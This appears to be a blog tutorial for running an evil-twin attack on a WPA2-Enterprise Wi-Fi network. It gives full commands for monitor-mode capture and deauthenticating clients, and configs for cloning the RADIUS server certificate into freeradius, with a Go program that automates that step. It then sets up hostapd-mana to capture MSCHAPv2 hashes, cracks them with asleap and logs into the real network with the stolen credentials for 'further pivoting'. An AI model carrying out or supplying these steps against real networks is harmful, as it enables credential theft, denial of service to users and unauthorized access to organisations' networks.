There are multiple variations of WPA2-Enterprise; this post focuses on the tooling rather than the protocol. It walks through using hostapd-mana and freeradius to create an evil twin of a WPA2-Enterprise network and then capture client credentials. The technique works against clients that authenticate with PEAP or EAP-TTLS and an MSCHAPv2 inner method without validating the RADIUS server certificate: they complete the MSCHAPv2 exchange with the rogue AP, which yields a challenge/response pair that can be cracked offline. Clients that pin the CA and server name, or that use EAP-TLS, will not hand anything over.
Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.
sudo airodump-ng wlan0mon
- BSSID –
- Channel –
- ESSID –
Step 3) Stop the process, then run airodump-ng again, locked to the target channel and BSSID, to gather the Station (client) MAC addresses. See "Troubleshooting Steps" if no Stations appear.
sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID from Step 2>
- Station –
Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP
sudo airodump-ng -c <channel> --bssid <BSSID from Step 2> -w out wlan0mon
Step 5) Launch another terminal and deauthenticate a client so that it re-authenticates. The RADIUS server certificate is sent in the clear inside the EAP-TLS handshake before the TLS tunnel is up, so the re-authentication is what lets you capture it. -a is the AP BSSID and -c the client to target (-h sets the source MAC of the injected frames, which is not what is wanted here)
sudo aireplay-ng -0 20 -a <BSSID from Step 2> -c <Station from Step 3> wlan0mon
Step 6) Stop airodump-ng and aireplay-ng, then inspect the PCAP file with Wireshark
sudo wireshark out-01.cap &
Step 7) In Wireshark, use the filter "tls.handshake.certificate".
Expand Packet Details > TLSv1 Record Layer > Handshake Protocol: Certificate > Certificates > Certificate. The first entry is the server's own (end-entity) certificate; the issuing CA certificate, if the server sends it, follows it.
Right click "Certificate: <super long hex string>" then click Export Packet Bytes... and save it as certificate.der
Step 8) Use openssl to obtain information about the certificate. Note both the "Issuer:" line (copied into the CA config in Step 10) and the "Subject:" line (copied into the server config in Step 11)
openssl x509 -inform der -in certificate.der -noout -text
C = countryName
ST = stateOrProvinceName
L = localityName
O = organizationName
emailAddress = the contact address embedded in the DN
CN = commonName
Step 9) Change to root
sudo -s
Step 10) Modify the freeradius CA certificate config
nano /etc/freeradius/3.0/certs/ca.cnf
- Search for, or scroll down to, the [certificate_authority] section
- Set countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the values from the "Issuer:" line in Step 8
- Note that commonName should be wrapped in " " (straight double quotes)
Step 11) Modify the freeradius server certificate config
nano /etc/freeradius/3.0/certs/server.cnf
- Search for, or scroll down to, the [server] section
- Set countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the values from the "Subject:" line in Step 8
- Note that commonName should be wrapped in " " (straight double quotes)
- In the [req] section, note the value of output_password (the stock value is whatever): the generated server.key is encrypted with it, and the private_key_password you give hostapd-mana in Step 14 must match it. Either keep whatever or set input_password and output_password to the password you intend to use there
Step 12) Create the certificates by navigating to the certs folder and running make. If a previous run already produced ca.pem and server.pem, make will not rebuild them; remove the old files first (the 3.0 Makefile has a destroycerts target for this) so the new Issuer/Subject values are actually used
cd /etc/freeradius/3.0/certs
make
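As an added example, not code from the original post or from freeradius, the Go program below does by hand what Steps 8 to 11 describe: it parses certificate.der, takes the Issuer DN for the [certificate_authority] section of ca.cnf and the Subject DN for the [server] section of server.cnf, and prints ready-to-paste key = "value" lines. emailAddress is not a named field of Go's pkix.Name, so the code walks the raw attribute list by OID. Run with no argument it builds a constructed server certificate signed by a constructed CA (all names, such as radius.example.com and Example Corp, are made up) so it runs offline; pass the real export as the first argument to use that instead.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/asn1"
	"fmt"
	"math/big"
	"os"
	"strings"
	"time"
)

// DN attribute OIDs mapped to the keys the stock freeradius ca.cnf / server.cnf use,
// in the order those files list them.
var dnKeys = []struct {
	oid asn1.ObjectIdentifier
	key string
}{
	{asn1.ObjectIdentifier{2, 5, 4, 6}, "countryName"},
	{asn1.ObjectIdentifier{2, 5, 4, 8}, "stateOrProvinceName"},
	{asn1.ObjectIdentifier{2, 5, 4, 7}, "localityName"},
	{asn1.ObjectIdentifier{2, 5, 4, 10}, "organizationName"},
	{asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 9, 1}, "emailAddress"},
	{asn1.ObjectIdentifier{2, 5, 4, 3}, "commonName"},
}

// cnfSection renders one DN as key = "value" lines under [header]. name.Names holds every
// attribute of the parsed DN, including emailAddress, which has no dedicated pkix.Name field.
// Only attributes actually present in the certificate are emitted.
func cnfSection(header string, name pkix.Name) string {
	var b strings.Builder
	fmt.Fprintf(&b, "[%s]\n", header)
	for _, k := range dnKeys {
		for _, atv := range name.Names {
			if atv.Type.Equal(k.oid) {
				fmt.Fprintf(&b, "%s = \"%v\"\n", k.key, atv.Value)
			}
		}
	}
	return b.String()
}

// cloneSections parses certificate.der and returns the ca.cnf stanza built from the Issuer
// and the server.cnf stanza built from the Subject.
func cloneSections(der []byte) (caCnf, serverCnf string, err error) {
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return "", "", err
	}
	return cnfSection("certificate_authority", cert.Issuer), cnfSection("server", cert.Subject), nil
}

// constructedCaptureDER stands in for a real export: a server certificate issued by a separate
// CA so that Issuer and Subject differ. Constructed test data with made-up names, not a capture.
func constructedCaptureDER() []byte {
	emailOID := asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 9, 1}
	mkName := func(cn, email string) pkix.Name {
		return pkix.Name{
			Country: []string{"US"}, Province: []string{"California"}, Locality: []string{"San Jose"},
			Organization: []string{"Example Corp"}, CommonName: cn,
			ExtraNames:   []pkix.AttributeTypeAndValue{{Type: emailOID, Value: email}},
		}
	}
	caKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	srvKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	now := time.Now()
	ca := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: mkName("Example Corp Root CA", "pki@example.com"),
		NotBefore: now, NotAfter: now.Add(24 * time.Hour), IsCA: true, BasicConstraintsValid: true,
	}
	caDER, _ := x509.CreateCertificate(rand.Reader, ca, ca, &caKey.PublicKey, caKey)
	caCert, _ := x509.ParseCertificate(caDER)
	srv := &x509.Certificate{
		SerialNumber: big.NewInt(2), Subject: mkName("radius.example.com", "netops@example.com"),
		NotBefore: now, NotAfter: now.Add(24 * time.Hour),
	}
	der, _ := x509.CreateCertificate(rand.Reader, srv, caCert, &srvKey.PublicKey, caKey)
	return der
}

func main() {
	der := constructedCaptureDER()
	if len(os.Args) > 1 { // e.g. ./clonecnf certificate.der
		der, _ = os.ReadFile(os.Args[1])
	}
	caCnf, serverCnf, err := cloneSections(der)
	if err != nil {
		fmt.Println("cannot parse certificate:", err)
		return
	}
	fmt.Print(caCnf, "\n", serverCnf)
}
```

If the captured certificate lacks one of the six attributes, the corresponding line is simply not printed; leave that key at its stock value (or comment it out) in the cnf rather than inventing one, since the goal is to mirror what the client has already seen.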
Step 13) Create a hostapd-mana eap user config file with the content after the nano command:
nano /etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
Step 14) Create a hostapd-mana config file with the content after the nano command:
nano /etc/hostapd-mana/mana.conf
#Wireless information
ssid=<ESSID from Step 2>
#wlan0 and wlan0mon share one radio: hostapd here and the deauth in Step 16 must stay on the same channel, or use a second adapter
interface=wlan0
driver=nl80211
channel=<channel from Step 2>
#hw_mode=g covers 2.4 GHz channels; use hw_mode=a if the target is on a 5 GHz channel
hw_mode=g
#EAP information
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
#Certificate information
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
#Password of server.key: must match output_password in server.cnf (stock value: whatever), otherwise hostapd-mana cannot load the key
private_key_password=12345678
dh_file=/etc/freeradius/3.0/certs/dh
#Setting some WPA details
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
#Setting mana config
mana_wpe=1
mana_credout=/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1
Step 15) Start hostapd-mana
hostapd-mana /etc/hostapd-mana/mana.conf
Step 16) If required, deauthenticate clients from the legitimate AP so they roam to the rogue network (with no -c this is a broadcast deauth that hits every client of that BSSID)
sudo aireplay-ng -0 5 -a <BSSID from Step 2> wlan0mon
Step 17) Inspect the hostapd-mana output: for each victim there should be a domain\username and the MSCHAPv2 challenge/response pair, printed in asleap, JTR and hashcat formats. These are not encrypted passwords; they are challenge/response values that have to be cracked offline (the hashcat line is for mode 5500).
For simplicity, launch a new terminal and use asleap with a wordlist, since hostapd-mana prints the exact -C and -R values to use
sudo asleap -C <challenge from hostapd-mana> -R <response from hostapd-mana> -W /usr/share/john/password.lst
Step 18) Create a wpa_supplicant config file to be used in Step 19. No ca_cert is set, so this client does not validate the server certificate either; that is acceptable for connecting to the target from the attack box, but it is exactly the weakness the attack relied on
nano wpa2enterprise.conf
network={
ssid="INPUT_ESSID_FROM_STEP_2"
scan_ssid=1
key_mgmt=WPA-EAP
identity="domain\username_FROM_STEP_17"
password="password_FROM_STEP_17"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Step 19) Connect to the WPA2-Enterprise network using wpa_supplicant
sudo wpa_supplicant -B -i wlan0 -c wpa2enterprise.conf
Step 20) Obtain IP address from the wireless router
sudo dhclient -v wlan0
Step 21) Perform further pivoting / attacks, then disconnect from the network
sudo killall wpa_supplicant